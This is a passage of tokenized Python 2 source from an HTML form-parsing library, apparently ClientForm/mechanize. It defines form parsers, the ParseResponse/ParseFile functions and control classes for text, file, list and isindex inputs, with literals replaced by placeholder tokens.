sgmllib . SGMLParser ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , entitydefs = None , encoding = DEFAULT_ENCODING ) : <EOL> sgmllib . SGMLParser . __init__ ( self ) <EOL> _AbstractFormParser . __init__ ( self , entitydefs , encoding ) <EOL> def feed ( self , data ) : <EOL> try : <EOL> sgmllib . SGMLParser . feed ( self , data ) <EOL> except SGMLLIB_PARSEERROR , exc : <EOL> raise ParseError ( exc ) <EOL> def close ( self ) : <EOL> sgmllib . SGMLParser . close ( self ) <EOL> self . end_body ( ) <EOL> def _create_bs_classes ( bs , <EOL> icbinbs , <EOL> ) : <EOL> class _AbstractBSFormParser ( _AbstractSgmllibParser ) : <EOL> bs_base_class = None <EOL> def __init__ ( self , entitydefs = None , encoding = DEFAULT_ENCODING ) : <EOL> _AbstractFormParser . __init__ ( self , entitydefs , encoding ) <EOL> self . bs_base_class . __init__ ( self ) <EOL> def handle_data ( self , data ) : <EOL> _AbstractFormParser . handle_data ( self , data ) <EOL> self . bs_base_class . handle_data ( self , data ) <EOL> def feed ( self , data ) : <EOL> try : <EOL> self . bs_base_class . feed ( self , data ) <EOL> except SGMLLIB_PARSEERROR , exc : <EOL> raise ParseError ( exc ) <EOL> def close ( self ) : <EOL> self . bs_base_class . close ( self ) <EOL> self . end_body ( ) <EOL> class RobustFormParser ( _AbstractBSFormParser , bs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> RobustFormParser . bs_base_class = bs <EOL> class NestingRobustFormParser ( _AbstractBSFormParser , icbinbs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> NestingRobustFormParser . bs_base_class = icbinbs <EOL> return RobustFormParser , NestingRobustFormParser <EOL> try : <EOL> if sys . version_info [ : <NUM_LIT:2> ] < ( <NUM_LIT:2> , <NUM_LIT:2> ) : <EOL> raise ImportError <EOL> import BeautifulSoup <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> RobustFormParser , NestingRobustFormParser = _create_bs_classes ( <EOL> BeautifulSoup . BeautifulSoup , BeautifulSoup . ICantBelieveItsBeautifulSoup <EOL> ) <EOL> __all__ += [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def ParseResponseEx ( response , <EOL> select_default = False , <EOL> form_parser_class = FormParser , <EOL> request_class = urllib2 . Request , <EOL> entitydefs = None , <EOL> encoding = DEFAULT_ENCODING , <EOL> _urljoin = urlparse . urljoin , <EOL> _urlparse = urlparse . urlparse , <EOL> _urlunparse = urlparse . urlunparse , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> return _ParseFileEx ( response , response . geturl ( ) , <EOL> select_default , <EOL> False , <EOL> form_parser_class , <EOL> request_class , <EOL> entitydefs , <EOL> False , <EOL> encoding , <EOL> _urljoin = _urljoin , <EOL> _urlparse = _urlparse , <EOL> _urlunparse = _urlunparse , <EOL> ) <EOL> def ParseFileEx ( file , base_uri , <EOL> select_default = False , <EOL> form_parser_class = FormParser , <EOL> request_class = urllib2 . Request , <EOL> entitydefs = None , <EOL> encoding = DEFAULT_ENCODING , <EOL> _urljoin = urlparse . urljoin , <EOL> _urlparse = urlparse . urlparse , <EOL> _urlunparse = urlparse . urlunparse , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> return _ParseFileEx ( file , base_uri , <EOL> select_default , <EOL> False , <EOL> form_parser_class , <EOL> request_class , <EOL> entitydefs , <EOL> False , <EOL> encoding , <EOL> _urljoin = _urljoin , <EOL> _urlparse = _urlparse , <EOL> _urlunparse = _urlunparse , <EOL> ) <EOL> def ParseResponse ( response , * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> return _ParseFileEx ( response , response . geturl ( ) , * args , ** kwds ) [ <NUM_LIT:1> : ] <EOL> def ParseFile ( file , base_uri , * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> return _ParseFileEx ( file , base_uri , * args , ** kwds ) [ <NUM_LIT:1> : ] <EOL> def _ParseFileEx ( file , base_uri , <EOL> select_default = False , <EOL> ignore_errors = False , <EOL> form_parser_class = FormParser , <EOL> request_class = urllib2 . Request , <EOL> entitydefs = None , <EOL> backwards_compat = True , <EOL> encoding = DEFAULT_ENCODING , <EOL> _urljoin = urlparse . urljoin , <EOL> _urlparse = urlparse . urlparse , <EOL> _urlunparse = urlparse . urlunparse , <EOL> ) : <EOL> if backwards_compat : <EOL> deprecation ( "<STR_LIT>" , <NUM_LIT:1> ) <EOL> fp = form_parser_class ( entitydefs , encoding ) <EOL> while <NUM_LIT:1> : <EOL> data = file . read ( CHUNK ) <EOL> try : <EOL> fp . feed ( data ) <EOL> except ParseError , e : <EOL> e . base_uri = base_uri <EOL> raise <EOL> if len ( data ) != CHUNK : break <EOL> fp . close ( ) <EOL> if fp . base is not None : <EOL> base_uri = fp . base <EOL> labels = [ ] <EOL> id_to_labels = { } <EOL> for l in fp . labels : <EOL> label = Label ( l ) <EOL> labels . append ( label ) <EOL> for_id = l [ "<STR_LIT>" ] <EOL> coll = id_to_labels . get ( for_id ) <EOL> if coll is None : <EOL> id_to_labels [ for_id ] = [ label ] <EOL> else : <EOL> coll . append ( label ) <EOL> forms = [ ] <EOL> for ( name , action , method , enctype ) , attrs , controls in fp . forms : <EOL> if action is None : <EOL> action = base_uri <EOL> else : <EOL> action = _urljoin ( base_uri , action ) <EOL> form = HTMLForm ( <EOL> action , method , enctype , name , attrs , request_class , <EOL> forms , labels , id_to_labels , backwards_compat ) <EOL> form . _urlparse = _urlparse <EOL> form . _urlunparse = _urlunparse <EOL> for ii in range ( len ( controls ) ) : <EOL> type , name , attrs = controls [ ii ] <EOL> form . new_control ( <EOL> type , name , attrs , select_default = select_default , index = ii * <NUM_LIT:10> ) <EOL> forms . append ( form ) <EOL> for form in forms : <EOL> form . fixup ( ) <EOL> return forms <EOL> class Label : <EOL> def __init__ ( self , attrs ) : <EOL> self . id = attrs . get ( "<STR_LIT>" ) <EOL> self . _text = attrs . get ( "<STR_LIT>" ) . strip ( ) <EOL> self . _ctext = compress_text ( self . _text ) <EOL> self . attrs = attrs <EOL> self . _backwards_compat = False <EOL> def __getattr__ ( self , name ) : <EOL> if name == "<STR_LIT:text>" : <EOL> if self . _backwards_compat : <EOL> return self . _text <EOL> else : <EOL> return self . _ctext <EOL> return getattr ( Label , name ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT:text>" : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> self . __dict__ [ name ] = value <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id , self . text ) <EOL> def _get_label ( attrs ) : <EOL> text = attrs . get ( "<STR_LIT>" ) <EOL> if text is not None : <EOL> return Label ( text ) <EOL> else : <EOL> return None <EOL> class Control : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def add_to_form ( self , form ) : <EOL> self . _form = form <EOL> form . controls . append ( self ) <EOL> def fixup ( self ) : <EOL> pass <EOL> def is_of_kind ( self , kind ) : <EOL> raise NotImplementedError ( ) <EOL> def clear ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def __getattr__ ( self , name ) : raise NotImplementedError ( ) <EOL> def __setattr__ ( self , name , value ) : raise NotImplementedError ( ) <EOL> def pairs ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ( k , v ) for ( i , k , v ) in self . _totally_ordered_pairs ( ) ] <EOL> def _totally_ordered_pairs ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def _write_mime_data ( self , mw , name , value ) : <EOL> """<STR_LIT>""" <EOL> mw2 = mw . nextpart ( ) <EOL> mw2 . addheader ( "<STR_LIT>" , <EOL> '<STR_LIT>' % name , <NUM_LIT:1> ) <EOL> f = mw2 . startbody ( prefix = <NUM_LIT:0> ) <EOL> f . write ( value ) <EOL> def __str__ ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def get_labels ( self ) : <EOL> """<STR_LIT>""" <EOL> res = [ ] <EOL> if self . _label : <EOL> res . append ( self . _label ) <EOL> if self . id : <EOL> res . extend ( self . _form . _id_to_labels . get ( self . id , ( ) ) ) <EOL> return res <EOL> class ScalarControl ( Control ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> self . _index = index <EOL> self . _label = _get_label ( attrs ) <EOL> self . __dict__ [ "<STR_LIT:type>" ] = type . lower ( ) <EOL> self . __dict__ [ "<STR_LIT:name>" ] = name <EOL> self . _value = attrs . get ( "<STR_LIT:value>" ) <EOL> self . disabled = attrs . has_key ( "<STR_LIT>" ) <EOL> self . readonly = attrs . has_key ( "<STR_LIT>" ) <EOL> self . id = attrs . get ( "<STR_LIT:id>" ) <EOL> self . attrs = attrs . copy ( ) <EOL> self . _clicked = False <EOL> self . _urlparse = urlparse . urlparse <EOL> self . _urlunparse = urlparse . urlunparse <EOL> def __getattr__ ( self , name ) : <EOL> if name == "<STR_LIT:value>" : <EOL> return self . __dict__ [ "<STR_LIT>" ] <EOL> else : <EOL> raise AttributeError ( "<STR_LIT>" % <EOL> ( self . __class__ . __name__ , name ) ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT:value>" : <EOL> if not isstringlike ( value ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> elif self . readonly : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> elif self . disabled : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> self . __dict__ [ "<STR_LIT>" ] = value <EOL> elif name in ( "<STR_LIT:name>" , "<STR_LIT:type>" ) : <EOL> raise AttributeError ( "<STR_LIT>" % name ) <EOL> else : <EOL> self . __dict__ [ name ] = value <EOL> def _totally_ordered_pairs ( self ) : <EOL> name = self . name <EOL> value = self . value <EOL> if name is None or value is None or self . disabled : <EOL> return [ ] <EOL> return [ ( self . _index , name , value ) ] <EOL> def clear ( self ) : <EOL> if self . readonly : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> self . __dict__ [ "<STR_LIT>" ] = None <EOL> def __str__ ( self ) : <EOL> name = self . name <EOL> value = self . value <EOL> if name is None : name = "<STR_LIT>" <EOL> if value is None : value = "<STR_LIT>" <EOL> infos = [ ] <EOL> if self . disabled : infos . append ( "<STR_LIT>" ) <EOL> if self . readonly : infos . append ( "<STR_LIT>" ) <EOL> info = "<STR_LIT:U+002CU+0020>" . join ( infos ) <EOL> if info : info = "<STR_LIT>" % info <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , name , value , info ) <EOL> class TextControl ( ScalarControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> ScalarControl . __init__ ( self , type , name , attrs , index ) <EOL> if self . type == "<STR_LIT>" : self . readonly = True <EOL> if self . _value is None : <EOL> self . _value = "<STR_LIT>" <EOL> def is_of_kind ( self , kind ) : return kind == "<STR_LIT:text>" <EOL> class FileControl ( ScalarControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> ScalarControl . __init__ ( self , type , name , attrs , index ) <EOL> self . _value = None <EOL> self . _upload_data = [ ] <EOL> def is_of_kind ( self , kind ) : return kind == "<STR_LIT:file>" <EOL> def clear ( self ) : <EOL> if self . readonly : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> self . _upload_data = [ ] <EOL> def __setattr__ ( self , name , value ) : <EOL> if name in ( "<STR_LIT:value>" , "<STR_LIT:name>" , "<STR_LIT:type>" ) : <EOL> raise AttributeError ( "<STR_LIT>" % name ) <EOL> else : <EOL> self . __dict__ [ name ] = value <EOL> def add_file ( self , file_object , content_type = None , filename = None ) : <EOL> if not hasattr ( file_object , "<STR_LIT>" ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if content_type is not None and not isstringlike ( content_type ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if filename is not None and not isstringlike ( filename ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if content_type is None : <EOL> content_type = "<STR_LIT>" <EOL> self . _upload_data . append ( ( file_object , content_type , filename ) ) <EOL> def _totally_ordered_pairs ( self ) : <EOL> if self . name is None or self . disabled : <EOL> return [ ] <EOL> return [ ( self . _index , self . name , "<STR_LIT>" ) ] <EOL> def _write_mime_data ( self , mw , _name , _value ) : <EOL> if len ( self . _upload_data ) < <NUM_LIT:2> : <EOL> if len ( self . _upload_data ) == <NUM_LIT:0> : <EOL> file_object = StringIO ( ) <EOL> content_type = "<STR_LIT>" <EOL> filename = "<STR_LIT>" <EOL> else : <EOL> file_object , content_type , filename = self . _upload_data [ <NUM_LIT:0> ] <EOL> if filename is None : <EOL> filename = "<STR_LIT>" <EOL> mw2 = mw . nextpart ( ) <EOL> fn_part = '<STR_LIT>' % filename <EOL> disp = '<STR_LIT>' % ( self . name , fn_part ) <EOL> mw2 . addheader ( "<STR_LIT>" , disp , prefix = <NUM_LIT:1> ) <EOL> fh = mw2 . startbody ( content_type , prefix = <NUM_LIT:0> ) <EOL> fh . write ( file_object . read ( ) ) <EOL> else : <EOL> mw2 = mw . nextpart ( ) <EOL> disp = '<STR_LIT>' % self . name <EOL> mw2 . addheader ( "<STR_LIT>" , disp , prefix = <NUM_LIT:1> ) <EOL> fh = mw2 . startmultipartbody ( "<STR_LIT>" , prefix = <NUM_LIT:0> ) <EOL> for file_object , content_type , filename in self . _upload_data : <EOL> mw3 = mw2 . nextpart ( ) <EOL> if filename is None : <EOL> filename = "<STR_LIT>" <EOL> fn_part = '<STR_LIT>' % filename <EOL> disp = "<STR_LIT>" % fn_part <EOL> mw3 . addheader ( "<STR_LIT>" , disp , prefix = <NUM_LIT:1> ) <EOL> fh2 = mw3 . startbody ( content_type , prefix = <NUM_LIT:0> ) <EOL> fh2 . write ( file_object . read ( ) ) <EOL> mw2 . lastpart ( ) <EOL> def __str__ ( self ) : <EOL> name = self . name <EOL> if name is None : name = "<STR_LIT>" <EOL> if not self . _upload_data : <EOL> value = "<STR_LIT>" <EOL> else : <EOL> value = [ ] <EOL> for file , ctype , filename in self . _upload_data : <EOL> if filename is None : <EOL> value . append ( "<STR_LIT>" ) <EOL> else : <EOL> value . append ( filename ) <EOL> value = "<STR_LIT:U+002CU+0020>" . join ( value ) <EOL> info = [ ] <EOL> if self . disabled : info . append ( "<STR_LIT>" ) <EOL> if self . readonly : info . append ( "<STR_LIT>" ) <EOL> info = "<STR_LIT:U+002CU+0020>" . join ( info ) <EOL> if info : info = "<STR_LIT>" % info <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , name , value , info ) <EOL> class IsindexControl ( ScalarControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> ScalarControl . __init__ ( self , type , name , attrs , index ) <EOL> if self . _value is None : <EOL> self . _value = "<STR_LIT>" <EOL> def is_of_kind ( self , kind ) : return kind in [ "<STR_LIT:text>" , "<STR_LIT>" ] <EOL> def _totally_ordered_pairs ( self ) : <EOL> return [ ] <EOL> def _click ( self , form , coord , return_type , request_class = urllib2 . Request ) : <EOL> parts = self . _urlparse ( form . action ) <EOL> rest , ( query , frag ) = parts [ : - <NUM_LIT:2> ] , parts [ - <NUM_LIT:2> : ] <EOL> parts = rest + ( urllib . quote_plus ( self . value ) , None ) <EOL> url = self . _urlunparse ( parts ) <EOL> req_data = url , None , [ ] <EOL> if return_type == "<STR_LIT>" : <EOL> return [ ] <EOL> elif return_type == "<STR_LIT>" : <EOL> return req_data <EOL> else : <EOL> return request_class ( url ) <EOL> def __str__ ( self ) : <EOL> value = self . value <EOL> if value is None : value = "<STR_LIT>" <EOL> infos = [ ] <EOL> if self . disabled : infos . append ( "<STR_LIT>" ) <EOL> if self . readonly : infos . append ( "<STR_LIT>" ) <EOL> info = "<STR_LIT:U+002CU+0020>" . join ( infos ) <EOL> if info : info = "<STR_LIT>" % info <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , value , info ) <EOL> class IgnoreControl ( ScalarControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> ScalarControl . __init__ ( self , type , name , attrs , index ) <EOL> self . _value = None <EOL> def is_of_kind ( self , kind ) : return False <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT:value>" : <EOL> raise AttributeError ( <EOL> "<STR_LIT>" % self . name ) <EOL> elif name in ( "<STR_LIT:name>" , "<STR_LIT:type>" ) : <EOL> raise AttributeError ( "<STR_LIT>" % name ) <EOL> else : <EOL> self . __dict__ [ name ] = value <EOL> class Item : <EOL> def __init__ ( self , control , attrs , index = None ) : <EOL> label = _get_label ( attrs ) <EOL> self . __dict__ . update ( { <EOL> "<STR_LIT:name>" : attrs [ "<STR_LIT:value>" ] , <EOL> "<STR_LIT>" : label and [ label ] or [ ] , <EOL> "<STR_LIT>" : attrs , <EOL> "<STR_LIT>" : control , <EOL> "<STR_LIT>" : attrs . has_key ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT:id>" : attrs . get ( "<STR_LIT:id>" ) , <EOL> "<STR_LIT>" : index , <EOL> } ) <EOL> control . items . append ( self ) <EOL> def get_labels ( self ) : <EOL> """<STR_LIT>""" <EOL> res = [ ] <EOL> res . extend ( self . _labels ) <EOL> if self . id : <EOL> res . extend ( self . _control . _form . _id_to_labels . get ( self . id , ( ) ) ) <EOL> return res <EOL> def __getattr__ ( self , name ) : <EOL> if name == "<STR_LIT>" : <EOL> return self . _selected <EOL> raise AttributeError ( name ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT>" : <EOL> self . _control . _set_selected_state ( self , value ) <EOL> elif name == "<STR_LIT>" : <EOL> self . __dict__ [ "<STR_LIT>" ] = bool ( value ) <EOL> else : <EOL> raise AttributeError ( name ) <EOL> def __str__ ( self ) : <EOL> res = self . name <EOL> if self . selected : <EOL> res = "<STR_LIT:*>" + res <EOL> if self . disabled : <EOL> res = "<STR_LIT>" % res <EOL> return res <EOL> def __repr__ ( self ) : <EOL> attrs = [ ( "<STR_LIT:name>" , self . name ) , ( "<STR_LIT:id>" , self . id ) ] + self . attrs . items ( ) <EOL> return "<STR_LIT>" % ( <EOL> self . __class__ . __name__ , <EOL> "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % ( k , v ) for k , v in attrs ] ) <EOL> ) <EOL> def disambiguate ( items , nr , ** kwds ) : <EOL> msgs = [ ] <EOL> for key , value in kwds . items ( ) : <EOL> msgs . append ( "<STR_LIT>" % ( key , value ) ) <EOL> msg = "<STR_LIT:U+0020>" . join ( msgs ) <EOL> if not items : <EOL> raise ItemNotFoundError ( msg ) <EOL> if nr is None : <EOL> if len ( items ) > <NUM_LIT:1> : <EOL> raise AmbiguityError ( msg ) <EOL> nr = <NUM_LIT:0> <EOL> if len ( items ) <= nr : <EOL> raise ItemNotFoundError ( msg ) <EOL> return items [ nr ] <EOL> class ListControl ( Control ) : <EOL> """<STR_LIT>""" <EOL> _label = None <EOL> def __init__ ( self , type , name , attrs = { } , select_default = False , <EOL> called_as_base_class = False , index = None ) : <EOL> """<STR_LIT>""" <EOL> if not called_as_base_class : <EOL> raise NotImplementedError ( ) <EOL> self . __dict__ [ "<STR_LIT:type>" ] = type . lower ( ) <EOL> self . __dict__ [ "<STR_LIT:name>" ] = name <EOL> self . _value = attrs . get ( "<STR_LIT:value>" ) <EOL> self . disabled = False <EOL> self . readonly = False <EOL> self . id = attrs . get ( "<STR_LIT:id>" ) <EOL> self . _closed = False <EOL> self . items = [ ] <EOL> self . _form = None <EOL> self . _select_default = select_default <EOL> self . _clicked = False <EOL> def clear ( self ) : <EOL> self . value = [ ] <EOL> def is_of_kind ( self , kind ) : <EOL> if kind == "<STR_LIT:list>" : <EOL> return True <EOL> elif kind == "<STR_LIT>" : <EOL> return bool ( self . multiple ) <EOL> elif kind == "<STR_LIT>" : <EOL> return not self . multiple <EOL> else : <EOL> return False <EOL> def get_items ( self , name = None , label = None , id = None , <EOL> exclude_disabled = False ) : <EOL> """<STR_LIT>""" <EOL> if name is not None and not isstringlike ( name ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if label is not None and not isstringlike ( label ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if id is not None and not isstringlike ( id ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> items = [ ] <EOL> compat = self . _form . backwards_compat <EOL> for o in self . items : <EOL> if exclude_disabled and o . disabled : <EOL> continue <EOL> if name is not None and o . name != name : <EOL> continue <EOL> if label is not None : <EOL> for l in o . get_labels ( ) : <EOL> if ( ( compat and l . text == label ) or <EOL> ( not compat and l . text . find ( label ) > - <NUM_LIT:1> ) ) : <EOL> break <EOL> else : <EOL> continue <EOL> if id is not None and o . id != id : <EOL> continue <EOL> items . append ( o ) <EOL> return items <EOL> def get ( self , name = None , label = None , id = None , nr = None , <EOL> exclude_disabled = False ) : <EOL> """<STR_LIT>""" <EOL> if nr is None and self . _form . backwards_compat : <EOL> nr = <NUM_LIT:0> <EOL> items = self . get_items ( name , label , id , exclude_disabled ) <EOL> return disambiguate ( items , nr , name = name , label = label , id = id ) <EOL> def _get ( self , name , by_label = False , nr = None , exclude_disabled = False ) : <EOL> if by_label : <EOL> name , label = None , name <EOL> else : <EOL> name , label = name , None <EOL> return self . get ( name , label , nr , exclude_disabled ) <EOL> def toggle ( self , name , by_label = False , nr = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> o = self . _get ( name , by_label , nr ) <EOL> self . _set_selected_state ( o , not o . selected ) <EOL> def set ( self , selected , name , by_label = False , nr = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> self . _set_selected_state ( self . _get ( name , by_label , nr ) , selected ) <EOL> def _set_selected_state ( self , item , action ) : <EOL> if self . disabled : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> if self . readonly : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> action == bool ( action ) <EOL> compat = self . _form . backwards_compat <EOL> if not compat and item . disabled : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> else : <EOL> if compat and item . disabled and action : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> if self . multiple : <EOL> item . __dict__ [ "<STR_LIT>" ] = action <EOL> else : <EOL> if not action : <EOL> item . __dict__ [ "<STR_LIT>" ] = False <EOL> else : <EOL> for o in self . items : <EOL> o . __dict__ [ "<STR_LIT>" ] = False <EOL> item . __dict__ [ "<STR_LIT>" ] = True <EOL> def toggle_single ( self , by_label = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> if len ( self . items ) != <NUM_LIT:1> : <EOL> raise ItemCountError ( <EOL> "<STR_LIT>" % self . name ) <EOL> item = self . items [ <NUM_LIT:0> ] <EOL> self . _set_selected_state ( item , not item . selected ) <EOL> def set_single ( self , selected , by_label = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> if len ( self . items ) != <NUM_LIT:1> : <EOL> raise ItemCountError ( <EOL> "<STR_LIT>" % self . name ) <EOL> self . _set_selected_state ( self . items [ <NUM_LIT:0> ] , selected ) <EOL> def get_item_disabled ( self , name , by_label = False , nr = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> return self . _get ( name , by_label , nr ) . disabled <EOL> def set_item_disabled ( self , disabled , name , by_label = False , nr = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> self . _get ( name , by_label , nr ) . disabled = disabled <EOL> def set_all_items_disabled ( self , disabled ) : <EOL> """<STR_LIT>""" <EOL> for o in self . items : <EOL> o . disabled = disabled <EOL> def get_item_attrs ( self , name , by_label = False , nr = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> return self . _get ( name , by_label , nr ) . attrs <EOL> def close_control ( self ) : <EOL> self . _closed = True <EOL> def add_to_form ( self , form ) : <EOL> assert self . _form is None or form == self . _form , ( <EOL> "<STR_LIT>" ) <EOL> self . _form = form <EOL> if self . name is None : <EOL> Control . add_to_form ( self , form ) <EOL> else : <EOL> for ii in range ( len ( form . controls ) - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> control = form . controls [ ii ] <EOL> if control . name == self . name and control . type == self . type : <EOL> if control . _closed : <EOL> Control . add_to_form ( self , form ) <EOL> else : <EOL> control . merge_control ( self ) <EOL> break <EOL> else : <EOL> Control . add_to_form ( self , form ) <EOL> def merge_control ( self , control ) : <EOL> assert bool ( control . multiple ) == bool ( self . multiple ) <EOL> self . items . extend ( control . items ) <EOL> def fixup ( self ) : <EOL> """<STR_LIT>""" <EOL> for o in self . items : <EOL> o . __dict__ [ "<STR_LIT>" ] = self <EOL> def __getattr__ ( self , name ) : <EOL> if name == "<STR_LIT:value>" : <EOL> compat = self . _form . backwards_compat <EOL> if self . name is None : <EOL> return [ ] <EOL> return [ o . name for o in self . items if o . selected and <EOL> ( not o . disabled or compat ) ] <EOL> else : <EOL> raise AttributeError ( "<STR_LIT>" % <EOL> ( self . __class__ . __name__ , name ) ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT:value>" : <EOL> if self . disabled : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> if self . readonly : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> self . _set_value ( value ) <EOL> elif name in ( "<STR_LIT:name>" , "<STR_LIT:type>" , "<STR_LIT>" ) : <EOL> raise AttributeError ( "<STR_LIT>" % name ) <EOL> else : <EOL> self . __dict__ [ name ] = value <EOL> def _set_value ( self , value ) : <EOL> if value is None or isstringlike ( value ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if not value : <EOL> compat = self . _form . backwards_compat <EOL> for o in self . items : <EOL> if not o . disabled or compat : <EOL> o . selected = False <EOL> elif self . multiple : <EOL> self . _multiple_set_value ( value ) <EOL> elif len ( value ) > <NUM_LIT:1> : <EOL> raise ItemCountError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> self . _single_set_value ( value ) <EOL> def _get_items ( self , name , target = <NUM_LIT:1> ) : <EOL> all_items = self . get_items ( name ) <EOL> items = [ o for o in all_items if not o . disabled ] <EOL> if len ( items ) < target : <EOL> if len ( all_items ) < target : <EOL> raise ItemNotFoundError ( <EOL> "<STR_LIT>" % name ) <EOL> else : <EOL> raise AttributeError ( <EOL> "<STR_LIT>" % name ) <EOL> on = [ ] <EOL> off = [ ] <EOL> for o in items : <EOL> if o . selected : <EOL> on . append ( o ) <EOL> else : <EOL> off . append ( o ) <EOL> return on , off <EOL> def _single_set_value ( self , value ) : <EOL> assert len ( value ) == <NUM_LIT:1> <EOL> on , off = self . _get_items ( value [ <NUM_LIT:0> ] ) <EOL> assert len ( on ) <= <NUM_LIT:1> <EOL> if not on : <EOL> off [ <NUM_LIT:0> ] . selected = True <EOL> def _multiple_set_value ( self , value ) : <EOL> compat = self . _form . backwards_compat <EOL> turn_on = [ ] <EOL> turn_off = [ item for item in self . items if <EOL> item . selected and ( not item . disabled or compat ) ] <EOL> names = { } <EOL> for nn in value : <EOL> if nn in names . keys ( ) : <EOL> names [ nn ] += <NUM_LIT:1> <EOL> else : <EOL> names [ nn ] = <NUM_LIT:1> <EOL> for name , count in names . items ( ) : <EOL> on , off = self . _get_items ( name , count ) <EOL> for i in range ( count ) : <EOL> if on : <EOL> item = on [ <NUM_LIT:0> ] <EOL> del on [ <NUM_LIT:0> ] <EOL> del turn_off [ turn_off . index ( item ) ] <EOL> else : <EOL> item = off [ <NUM_LIT:0> ] <EOL> del off [ <NUM_LIT:0> ] <EOL> turn_on . append ( item ) <EOL> for item in turn_off : <EOL> item . selected = False <EOL> for item in turn_on : <EOL> item . selected = True <EOL> def set_value_by_label ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if isstringlike ( value ) : <EOL> raise TypeError ( value ) <EOL> if not self . multiple and len ( value ) > <NUM_LIT:1> : <EOL> raise ItemCountError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> items = [ ] <EOL> for nn in value : <EOL> found = self . get_items ( label = nn ) <EOL> if len ( found ) > <NUM_LIT:1> : <EOL> if not self . _form . backwards_compat : <EOL> opt_name = found [ <NUM_LIT:0> ] . name <EOL> if [ o for o in found [ <NUM_LIT:1> : ] if o . name != opt_name ] : <EOL> raise AmbiguityError ( nn ) <EOL> else : <EOL> found = found [ : <NUM_LIT:1> ] <EOL> for o in found : <EOL> if self . _form . backwards_compat or o not in items : <EOL> items . append ( o ) <EOL> break <EOL> else : <EOL> raise ItemNotFoundError ( nn ) <EOL> self . value = [ ] <EOL> for o in items : <EOL> o . selected = True <EOL> def get_value_by_label ( self ) : <EOL> """<STR_LIT>""" <EOL> res = [ ] <EOL> compat = self . _form . backwards_compat <EOL> for o in self . items : <EOL> if ( not o . disabled or compat ) and o . selected : <EOL> for l in o . get_labels ( ) : <EOL> if l . text : <EOL> res . append ( l . text ) <EOL> break <EOL> else : <EOL> res . append ( None ) <EOL> return res <EOL> def possible_items ( self , by_label = False ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> if by_label : <EOL> res = [ ] <EOL> for o in self . items : <EOL> for l in o . get_labels ( ) : <EOL> if l . text : <EOL> res . append ( l . text ) <EOL> break <EOL> else : <EOL> res 